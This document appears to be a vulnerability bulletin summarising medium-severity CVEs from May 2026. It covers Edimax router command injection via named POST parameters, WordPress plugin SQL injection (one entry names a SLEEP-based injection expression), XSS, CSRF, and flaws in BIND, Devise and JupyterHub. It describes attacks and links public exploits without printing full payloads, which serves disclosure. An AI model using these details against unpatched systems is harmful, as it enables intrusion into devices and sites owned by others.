Edimax–BR-6428NS A weakness has been identified in Edimax BR-6428NS 1.10. This impacts the function system of the file /goform/formWlanM of the component POST Request Handler. Executing a manipulation of the argument ateFunc/ateGain/ateTxCount/ateChan/ateRate/ateMacID/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/ateTxFreqOffset/ateMode/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/e2pTxPwDeltaN/readE2P can lead to command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-23 6.3 CVE-2026-9296 VDB-365243 | Edimax BR-6428NS POST Request formWlanM system command injection
VDB-365243 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811535 | EDIMAX BR-6428NS BR-6428NS_v4_1.10 Command Injection
https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formWlanMP-34b53a41781f808fb207ce3f297db80b?source=copy_link
 
Edimax–BR-6428NS A security vulnerability has been detected in Edimax BR-6428NS 1.10. Affected is the function formWlbasic of the file /goform/formWlbasic of the component POST Request Handler. The manipulation of the argument repeaterSSID leads to command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-23 6.3 CVE-2026-9297 VDB-365244 | Edimax BR-6428NS POST Request formWlbasic command injection
VDB-365244 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811536 | EDIMAX BR-6428NS BR-6428NS_v4_1.10 Command Injection
https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formWlbasic-34b53a41781f807fb398dbab03bdbb38?source=copy_link
 
Edimax–BR-6675nD A security flaw has been discovered in Edimax BR-6675nD 1.12. This affects the function formHwSet of the file /goform/formHwSet of the component POST Request Handler. The manipulation of the argument regDomain/ABandregDomain/nic0Addr/nic1Addr/wlanAddr/inicAddr results in command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 6.3 CVE-2026-9378 VDB-365341 | Edimax BR-6675nD POST Request formHwSet command injection
VDB-365341 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811555 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection
https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formHwSet-34b53a41781f8077b588f6e7cbbed36b?source=copy_link
 
Edimax–BR-6675nD A weakness has been identified in Edimax BR-6675nD 1.12. This impacts the function formWpsStart of the file /goform/formWpsStart of the component POST Request Handler. This manipulation of the argument pinCode causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 6.3 CVE-2026-9379 VDB-365342 | Edimax BR-6675nD POST Request formWpsStart command injection
VDB-365342 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811556 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection
Submit #811567 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection (Duplicate)
https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formWpsStart-34b53a41781f8011b77ac5ebb77dfddd?source=copy_link
 
Edimax–BR-6675nD A flaw has been found in Edimax BR-6675nD 1.12. This issue affects the function formUSBStorage of the file /goform/formUSBStorage of the component POST Request Handler. Executing a manipulation of the argument sub_dir can lead to command injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 6.3 CVE-2026-9400 VDB-365381 | Edimax BR-6675nD POST Request formUSBStorage command injection
VDB-365381 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811562 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection
https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formUSBStorage-34b53a41781f80809fc9e6ab3c51328b?source=copy_link
 
Edimax–BR-6675nD A vulnerability was found in Edimax BR-6675nD 1.12. The affected element is the function formWlanMP of the file /goform/formWlanMP of the component POST Request Handler. The manipulation of the argument ateFunc/ateGain/ateRate/ateChan/ateTxCount/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/ateTxFreqOffset/ateMode/ateMacID/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/readE2P/e2pTxPwDeltaN results in command injection. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 6.3 CVE-2026-9402 VDB-365383 | Edimax BR-6675nD POST Request formWlanMP command injection
VDB-365383 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811565 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection
https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formWlanMP-34b53a41781f8041aa2ecb4fa1927f59?source=copy_link
 
Edimax–EW-7438RPn A weakness has been identified in Edimax EW-7438RPn up to 1.31. The affected element is the function formWpsStart of the file /goform/formWpsStart of the component webs. This manipulation of the argument pinCode causes os command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-23 6.3 CVE-2026-9343 VDB-365306 | Edimax EW-7438RPn webs formWpsStart os command injection
VDB-365306 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #813884 | Edimax EW-7438RPn 1.31 Command Injection
Submit #811551 | EDIMAX EW-7438RPn Mini EW-7438RPn Mini Firmware 1.28a (Version : 1.28a) Command Injection (Duplicate)
https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_1/1.md
 
Edimax–EW-7438RPn A vulnerability has been found in Edimax EW-7438RPn up to 1.31. Affected is the function formWizSurvey of the file /goform/formWizSurvey of the component webs. The manipulation of the argument ip/mask/gateway leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 6.3 CVE-2026-9347 VDB-365310 | Edimax EW-7438RPn webs formWizSurvey os command injection
VDB-365310 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #813889 | Edimax EW-7438RPn 1.31 Command Injection
Submit #811543 | EDIMAX EW-7438RPn Mini EW-7438RPn Mini Firmware 1.28a (Version : 1.28a) Command Injection (Duplicate)
https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_5/5.md
 
Edimax–EW-7438RPn A vulnerability was identified in Edimax EW-7438RPn 1.28a. Affected by this vulnerability is the function formHwSet of the file /goform/formHwSet of the component POST Request Handler. The manipulation of the argument Anntena/Mcs/regDomain/nic0Addr/nic1Addr/wlanAddr/wanAddr/wlanSSID/wlanChan/comd/initgain/txcck/txofdm leads to command injection. The attack can be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 6.3 CVE-2026-9359 VDB-365322 | Edimax EW-7438RPn POST Request formHwSet command injection
VDB-365322 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811540 | EDIMAX EW-7438RPn Mini EW-7438RPn Mini Firmware 1.28a (Version : 1.28a) Command Injection
https://lavender-bicycle-a5a.notion.site/EDIMAX-EW-7438RPn-Mini-formHwSet-34b53a41781f80b98d10f0da699f2236?source=copy_link
 
Edimax–EW-7438RPn A weakness has been identified in Edimax EW-7438RPn 1.12. This affects the function formAccept of the file /goform/formAccep of the component POST Request Handler. This manipulation of the argument submit-url causes command injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 6.3 CVE-2026-9361 VDB-365324 | Edimax EW-7438RPn POST Request formAccep formAccept command injection
VDB-365324 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811552 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection
https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formAccept-34b53a41781f807fb8f3d96c5e5ef215?source=copy_link
 
Edimax–EW-7438RPn A security vulnerability has been detected in Edimax EW-7438RPn 1.12. This vulnerability affects the function formConnectionSetting of the file /goform/formConnectionSetting of the component Setting Handler. Such manipulation of the argument max_Conn/timeOut leads to command injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 6.3 CVE-2026-9362 VDB-365325 | Edimax EW-7438RPn Setting formConnectionSetting command injection
VDB-365325 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811553 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection
https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formConnectionSetting-34b53a41781f807a9c88e746d24540cd?source=copy_link
 
Edimax–EW-7438RPn A vulnerability was detected in Edimax EW-7438RPn 1.12. This issue affects the function formEZCHNwlanSetup of the file /goform/formEZCHNwlanSetu of the component POST Request Handler. Performing a manipulation of the argument method results in command injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 6.3 CVE-2026-9363 VDB-365326 | Edimax EW-7438RPn POST Request formEZCHNwlanSetu formEZCHNwlanSetup command injection
VDB-365326 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #811554 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection
https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formEZCHNwlanSetup-34b53a41781f803a8c60ca409394df5b?source=copy_link
 
edmonparker–Read More & Accordion The Read More & Accordion plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in all versions up to, and including, 3.5.7. This is due to the use of esc_sql() without surrounding the value in quotes in an ORDER BY clause inside the getAllDataByLimit() and getAccordionAllDataByLimit() functions in ReadMoreData.php. The user-supplied $_GET['orderby'] value is only processed through esc_attr() (an HTML-escaping function) before being passed to these database functions, where esc_sql() is applied but the value is directly concatenated, unquoted, into the ORDER BY fragment of the SQL query before $wpdb->prepare() is called. Because esc_sql() only escapes quote characters and backslashes (which are irrelevant in an unquoted ORDER BY context), an attacker can inject arbitrary SQL expressions such as (SELECT SLEEP(5)) or conditional subqueries to perform time-based blind data extraction. This makes it possible for authenticated attackers with administrator-level access or above (or any role explicitly permitted access to the plugin’s admin pages via the yrm-user-roles setting) to extract sensitive data from the database, including administrator credential hashes. 2026-05-20 4.9 CVE-2026-7472 https://www.wordfence.com/threat-intel/vulnerabilities/id/cc7c7e21-fbd7-4451-bc7d-3d11db01a443?source=cve
https://plugins.trac.wordpress.org/browser/expand-maker/trunk/classes/ReadMoreData.php#L1522
https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/classes/ReadMoreData.php#L1522
https://plugins.trac.wordpress.org/browser/expand-maker/trunk/views/readMorePagesView.php#L29
https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/views/readMorePagesView.php#L29
https://plugins.trac.wordpress.org/browser/expand-maker/trunk/classes/ReadMoreData.php#L1537
https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/classes/ReadMoreData.php#L1537
https://plugins.trac.wordpress.org/browser/expand-maker/trunk/views/accordionBuilder/list.php#L29
https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/views/accordionBuilder/list.php#L29
 
espocrm–espocrm EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below allow authenticated users to upload SVG attachments through normal attachment-capable fields and later serve those SVG files as top-level inline documents through both the attachment and image entry points, resulting in stored cross-user XSS reachable through a normal attachment workflow. Although inline SVG script is blocked by the response CSP, the same CSP still allows same-origin external script. As a result, an attacker can upload a malicious SVG together with a second attacker-controlled JavaScript attachment, then trick another user into opening the SVG to execute JavaScript in the victim’s EspoCRM origin. This issue has been fixed in version 9.3.4. 2026-05-19 6.8 CVE-2026-33741 https://github.com/espocrm/espocrm/security/advisories/GHSA-5wh5-ccv2-m3pv
 
Esri–ArcGIS Server ArcGIS Server contains an improper authentication vulnerability in an undocumented administrative endpoint. An unauthenticated attacker could exploit this issue by sending a crafted request to the endpoint. Successful exploitation may result in disruption of the web-based browsing interface. This issue affects ArcGIS Server 12.0 and earlier. 2026-05-20 5.3 CVE-2026-2812 https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/april2026_security_bulletin
 
Esri–ArcGIS Server ArcGIS Server contains an input validation weakness in the login redirection workflow. An authenticated attacker could exploit this issue by sending a specially crafted request. Successful exploitation may result in the application redirecting the browser to an unintended, untrusted site, resulting in a limited confidentiality impact under specific user interaction conditions. The vulnerability affects only the client-side navigation logic during authentication and remains confined to the same security boundary. No server-side compromise or cross-component impact is possible. This issue affects ArcGIS Server 11.5. 2026-05-20 4.7 CVE-2026-2813 https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/april2026_security_bulletin
 
etspring–LJ comments import: reloaded The LJ comments import: reloaded plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PHP_SELF Parameter in all versions up to, and including, 0.97.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The vulnerability arises specifically because PHP_SELF includes attacker-controllable PATH_INFO appended to the script name, and there are two distinct unsanitized echo points for this value in the same function. 2026-05-20 6.1 CVE-2026-8624 https://www.wordfence.com/threat-intel/vulnerabilities/id/0f09cb59-dbbb-48a3-aeac-377f6ec87b88?source=cve
https://plugins.trac.wordpress.org/browser/lj-comments-import-reloaded/trunk/lj_comments_import.php#L129
https://plugins.trac.wordpress.org/browser/lj-comments-import-reloaded/trunk/lj_comments_import.php#L161
 
goback2–Logo Manager For Enamad The Logo Manager For Enamad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute of the `vc_enamad_namad`, `vc_enamad_shamed`, and `vc_enamad_custom` shortcodes in all versions up to, and including, 0.7.4 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2026-05-20 6.4 CVE-2026-6549 https://www.wordfence.com/threat-intel/vulnerabilities/id/ed6d1167-c89d-4c97-9446-b968df945e6c?source=cve
https://wordpress.org/plugins/logo-manager-for-enamad
https://plugins.trac.wordpress.org/browser/logo-manager-for-enamad/tags/0.7.4/widgets.php#L295
https://plugins.trac.wordpress.org/browser/logo-manager-for-enamad/trunk/widgets.php#L295
 
HCL–BigFix Service Management (SM) HCL BigFix Service Management (SM) is susceptible to a configuration weakness, ‘Insecure Use of Base Image Version’. Using outdated or insecure base images may introduce known vulnerabilities, potentially increasing the risk of exploitation in the application environment. 2026-05-20 4 CVE-2025-31973 https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144
 
HCLSoftware–Connections HCL Connections contains a broken access control vulnerability that may allow an unauthorized user to update data in certain scenarios. 2026-05-18 4.6 CVE-2026-21789 https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129719
 
HCLSoftware–DominoIQ The HCL DominoIQ RAG feature is affected by a Broken Access Control vulnerability. Under certain circumstances, document level access restrictions will be ignored when determining what data to return from an AI query. This could enable an authenticated attacker to view sensitive data. 2026-05-20 6.5 CVE-2026-21836 https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130932
 
heartcombo–devise Devise is an authentication solution for Rails based on Warden. In versions 5.0.3 and below, when the Timeoutable module is enabled in Devise, the FailureApp#redirect_url method returns request.referrer – the HTTP Referer header, which is attacker-controllable – without validation for any non-GET request that results in a session timeout. An attacker who hosts a page with an auto-submitting cross-origin form can cause a victim with an expired Devise session to be redirected to an arbitrary external URL. This contrasts with the GET timeout path (which uses server-side attempted_path) and Devise’s own store_location_for mechanism (which strips external hosts via extract_path_from_location), both of which are protected; only the non-GET timeout redirect path is unprotected. Expired-session users can be silently redirected from the trusted app domain to attacker-controlled URLs, enabling phishing and malware delivery while bypassing browser warnings. Note: Rails’ built-in open-redirect protection does not mitigate this issue. Devise::FailureApp is an ActionController::Metal app with its own isolated copy of the relevant redirect configuration, so config.action_controller.action_on_open_redirect = :raise (and the older raise_on_open_redirects setting) do not reach it. This issue has been fixed in version 5.0.4. 2026-05-22 6.1 CVE-2026-40295 https://github.com/heartcombo/devise/security/advisories/GHSA-jp94-3292-c3xv
https://github.com/heartcombo/devise/commit/025fe2124f9928766fc46520e999633b598d0360
 
helgatheviking–KIA Subtitle The KIA Subtitle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s `the-subtitle` shortcode `before` and `after` attributes in all versions up to, and including, 4.0.1. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2026-05-22 6.4 CVE-2026-7509 https://www.wordfence.com/threat-intel/vulnerabilities/id/a9a52097-0d85-4036-9b74-f35fea549607?source=cve
https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.1/kia-subtitle.php#L359
https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.1/kia-subtitle.php#L329
https://plugins.trac.wordpress.org/browser/kia-subtitle/trunk/kia-subtitle.php#L359
https://plugins.trac.wordpress.org/browser/kia-subtitle/trunk/kia-subtitle.php#L329
https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.2/kia-subtitle.php#L369
https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.2/kia-subtitle.php#L370
 
helpstring–Child Height Predictor by Ostheimer The Child Height Predictor by Ostheimer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to and including 1.3. This is due to missing nonce verification in the options() function, which handles plugin settings updates. The form template does not include a wp_nonce_field() call, and the handler never calls check_admin_referer() or wp_verify_nonce(). This makes it possible for unauthenticated attackers to trick a site administrator into clicking a link or visiting a malicious page that submits a forged POST request, causing unauthorized changes to the plugin settings such as unit preferences to be persisted to the database via update_option(). 2026-05-20 4.3 CVE-2026-6400 https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1681a8-5f2e-45f1-96d9-797b13644607?source=cve
https://plugins.trac.wordpress.org/browser/child-height-predictor/trunk/childheight.php#L149
https://plugins.trac.wordpress.org/browser/child-height-predictor/tags/1.3/childheight.php#L149
https://plugins.trac.wordpress.org/browser/child-height-predictor/trunk/childheight.php#L135
https://plugins.trac.wordpress.org/browser/child-height-predictor/tags/1.3/childheight.php#L135
 
Honeywell International Inc.–Control Network Module (CNM) Honeywell Control Network Module (CNM) contains insertion of sensitive information into an unintended directory. An attacker could exploit this vulnerability through probing system files, potentially resulting in unintended access to protected data. 2026-05-21 5.9 CVE-2026-5434 https://process.honeywell.com/
 
infility–Infility Global The Infility Global plugin for WordPress is vulnerable to SQL Injection via the ‘orderby’ and ‘order’ parameters in all versions up to, and including, 2.15.16. This is due to insufficient escaping on user supplied parameters and lack of sufficient preparation on the existing SQL query within the show_control_data::post_list() function, which is registered as an admin menu page with only the ‘read’ capability. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. 2026-05-20 6.5 CVE-2026-8685 https://www.wordfence.com/threat-intel/vulnerabilities/id/1caeb5e0-9e4e-4c9e-a6e4-881fb81dc5f2?source=cve
https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L34
https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L74
https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L78
https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L84
 
Intelbras–VIP-1230-D-G4 An issue in Intelbras VIP-1230-D-G4 Version V2.800.00IB00C.0.T allows a remote attacker to obtain sensitive information via the password reset functionality under /OutsideCmd. 2026-05-18 5.3 CVE-2026-36438 https://backend.intelbras.com/sites/default/files/2023-03/Datasheet%20UNIFICADO%20-%20VIP%201230%20B.D.G4-v2.pdf
https://www.intelbras.com/pt-br/camera-dome-wi-fi-vip-1230-d-w-g4
https://github.com/kensh1k/CVE-2026-36438/tree/main
 
ISC–BIND 9 BIND resolvers are vulnerable to an amplified resource consumption/exhaustion attack. If a victim resolver makes a query to a specially crafted zone, the resolver will consume disproportionate resources. This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. 2026-05-20 5.3 CVE-2026-3592 CVE-2026-3592
https://downloads.isc.org/isc/bind9/9.18.49
https://downloads.isc.org/isc/bind9/9.20.23
https://downloads.isc.org/isc/bind9/9.21.22
 
ISC–BIND 9 An unbounded resend loop vulnerability exists in the BIND 9 resolver state machine during bad-server handling, enabling a remote unauthenticated attacker to cause severe resource exhaustion by sending queries that trigger specific retry conditions. This issue affects BIND 9 versions 9.18.36 through 9.18.48, 9.20.8 through 9.20.22, 9.21.7 through 9.21.21, 9.18.36-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. 2026-05-20 5.3 CVE-2026-5950 CVE-2026-5950
https://downloads.isc.org/isc/bind9/9.18.49
https://downloads.isc.org/isc/bind9/9.20.23
https://downloads.isc.org/isc/bind9/9.21.22
 
ItzCrazyKns–Vane A security vulnerability has been detected in ItzCrazyKns Vane up to 1.12.1. Affected by this issue is some unknown functionality of the file route.ts of the component API. The manipulation leads to missing authentication. The attack may be initiated remotely. The attack’s complexity is rated as high. The exploitation is known to be difficult. The exploit has been disclosed publicly and may be used. It appears that basic authentication is planned. 2026-05-24 5.6 CVE-2026-9371 VDB-365334 | ItzCrazyKns Vane API route.ts missing authentication
VDB-365334 | CTI Indicators (IOB, IOC, IOA)
Submit #813209 | ItzCrazyKns Vane 1.12.1 API Key Exposure
Submit #813210 | ItzCrazyKns Vane 1.12.1 Missing Authentication for Critical Function (Duplicate)
https://github.com/ItzCrazyKns/Vane/issues/1122
https://github.com/ItzCrazyKns/Vane/issues/1123
https://github.com/ItzCrazyKns/Vane/
 
jarrodwatts–claude-hud Claude HUD through 0.0.12, patched in commit 234d9aa, constructs OSC 8 terminal hyperlink escape sequences using raw cwd and branchUrl values without stripping control characters or encoding embedded values, allowing attackers to inject arbitrary ANSI codes into terminal sessions. Attackers can embed ESC+backslash sequences in the current working directory or branch URL to execute malicious ANSI codes including text color changes, forged prompts, and OSC 52 clipboard writes, or trigger outbound HTTP requests to attacker-controlled remotes when hyperlinks are clicked. 2026-05-18 4.6 CVE-2026-47090 https://github.com/jarrodwatts/claude-hud/issues/485
https://github.com/jarrodwatts/claude-hud/pull/487
https://github.com/jarrodwatts/claude-hud/commit/234d9aad919b51326a43bcf90b45ae35c23afc30
https://www.vulncheck.com/advisories/claude-hud-terminal-injection-via-osc-8-hyperlinks
 
javibola–JaviBola Custom Theme Test The JaviBola Custom Theme Test plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.5. This is due to missing or incorrect nonce validation on the options page. This makes it possible for unauthenticated attackers to change the site’s active theme by modifying the jbct_theme option via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2026-05-20 4.3 CVE-2026-8423 https://www.wordfence.com/threat-intel/vulnerabilities/id/68a8a277-2ea6-4d75-b8cd-4d20eb17b3aa?source=cve
https://plugins.trac.wordpress.org/browser/javibola-custom-theme/trunk/javibola-custom-theme.php#L41
https://plugins.trac.wordpress.org/browser/javibola-custom-theme/tags/2.0.5/javibola-custom-theme.php#L41
https://plugins.trac.wordpress.org/browser/javibola-custom-theme/trunk/javibola-custom-theme.php#L40
https://plugins.trac.wordpress.org/browser/javibola-custom-theme/tags/2.0.5/javibola-custom-theme.php#L40
https://plugins.trac.wordpress.org/browser/javibola-custom-theme/trunk/javibola-custom-theme.php#L54
https://plugins.trac.wordpress.org/browser/javibola-custom-theme/tags/2.0.5/javibola-custom-theme.php#L54
 
jay_patel–Remove Yellow BGBOX The Remove Yellow BGBOX plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the ‘rybb_api_settings’ page. This makes it possible for unauthenticated attackers to reset the plugin’s stored settings by overwriting its configuration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2026-05-20 4.3 CVE-2026-8424 https://www.wordfence.com/threat-intel/vulnerabilities/id/c5b30d27-a3f8-4535-a47f-675c939ec648?source=cve
https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/trunk/admin/rybb_api_settings.php#L5
https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/tags/1.0/admin/rybb_api_settings.php#L5
https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/trunk/includes/functions.php#L16
https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/tags/1.0/includes/functions.php#L16
 
jetmonsters–MotoPress Hotel Booking The MotoPress Hotel Booking plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 6.0.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to overwrite or delete the internal notes (_mphb_booking_internal_notes) of any booking by supplying an arbitrary booking ID. The nonce for this action is output in the HTML source of every public page through wp_localize_script (MPHB._data.nonces), so any unauthenticated visitor can obtain a valid nonce and perform the action without any account or prior interaction. 2026-05-22 5.3 CVE-2026-8684 https://www.wordfence.com/threat-intel/vulnerabilities/id/6567e63c-3129-47b2-a734-733eb599821a?source=cve
https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/6.0.1/includes/ajax-api/ajax-actions/update-booking-notes.php#L83
https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/6.0.1/includes/ajax-api/ajax-actions/abstract-ajax-api-action.php#L34
https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/6.0.1/includes/ajax-api/ajax-api-handler.php#L43
https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/5.4.1/includes/ajax-api/ajax-actions/update-booking-notes.php#L83
https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/5.4.1/includes/ajax-api/ajax-actions/abstract-ajax-api-action.php#L34
https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/5.4.1/includes/ajax-api/ajax-api-handler.php#L43
https://plugins.trac.wordpress.org/changeset/3537354/motopress-hotel-booking-lite/trunk/includes/ajax-api/ajax-actions/update-booking-notes.php
 
Jomres–Jomres Joomla Component jomres 9.11.2 contains a cross-site request forgery vulnerability that allows attackers to modify user account information by tricking authenticated users into visiting malicious pages. Attackers can craft HTML forms targeting the account/index endpoint with hidden fields to change passwords, email addresses, and profile details without user consent. 2026-05-23 4.3 CVE-2018-25354 ExploitDB-44901
Official Product Homepage
Product Reference
VulnCheck Advisory: Joomla Component jomres 9.11.2 Cross-Site Request Forgery
 
jupyterhub–jupyterhub JupyterHub is software that allows users to create a multi-user server for Jupyter notebooks. In versions 4.1.0 through 5.4.4, XSRF protection (updated in 4.1.0) inappropriately treated requests with Sec-Fetch-Mode: no-cors as same-origin requests, bypassing XSRF checks. The JSON API is not affected, only HTTP form endpoints, such as /hub/spawn and /hub/accept-share, meaning attackers could trigger server spawn (but not access the server) and if the attacker is a JupyterHub user permitted to share access to their server, cause a user to accept a share and have access to the attacker’s server. This issue has been fixed in version 5.4.5. If developers are unable to immediately upgrade, they can temporarily mitigate this issue by dropping requests to JupyterHub with Sec-Fetch-Mode: no-cors if they are using a reverse proxy. 2026-05-22 5.4 CVE-2026-40864 https://github.com/jupyterhub/jupyterhub/security/advisories/GHSA-m68r-v472-jgq9
https://github.com/jupyterhub/jupyterhub/commit/9c5ec277d3cda5a59de2d8c8117efa77bd941127
 
kasparsd–Widget Context The Widget Context plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.3. This is due to missing or incorrect nonce validation on the save_widget_context_settings function. This makes it possible for unauthenticated attackers to modify widget visibility context settings stored in the WordPress options table via a forged POST request to /wp-admin/widgets.php, granted they can trick a site administrator into performing an action such as clicking on a link. 2026-05-22 4.3 CVE-2026-7615 https://www.wordfence.com/threat-intel/vulnerabilities/id/3c434637-4bf9-46ee-9a6d-35eab7ef11a1?source=cve
https://plugins.trac.wordpress.org/browser/widget-context/trunk/src/WidgetContext.php#L311
https://plugins.trac.wordpress.org/browser/widget-context/tags/1.3.3/src/WidgetContext.php#L311
https://plugins.trac.wordpress.org/browser/widget-context/trunk/src/WidgetContext.php#L282
https://plugins.trac.wordpress.org/browser/widget-context/tags/1.3.3/src/WidgetContext.php#L282
https://plugins.trac.wordpress.org/browser/widget-context/trunk/src/WidgetContext.php#L91
https://plugins.trac.wordpress.org/browser/widget-context/tags/1.3.3/src/WidgetContext.php#L91
https://github.com/kasparsd/widget-context-wporg/pull/73
 
Kieback & Peter–DDC4002 The affected Kieback & Peter DDC building controllers are vulnerable to cross-site scripting, enabling JavaScript to be executed by the victim’s browser, which allows the attacker to control the browser. 2026-05-20 5.3 CVE-2026-4293 https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-05
https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-139-05.json
 
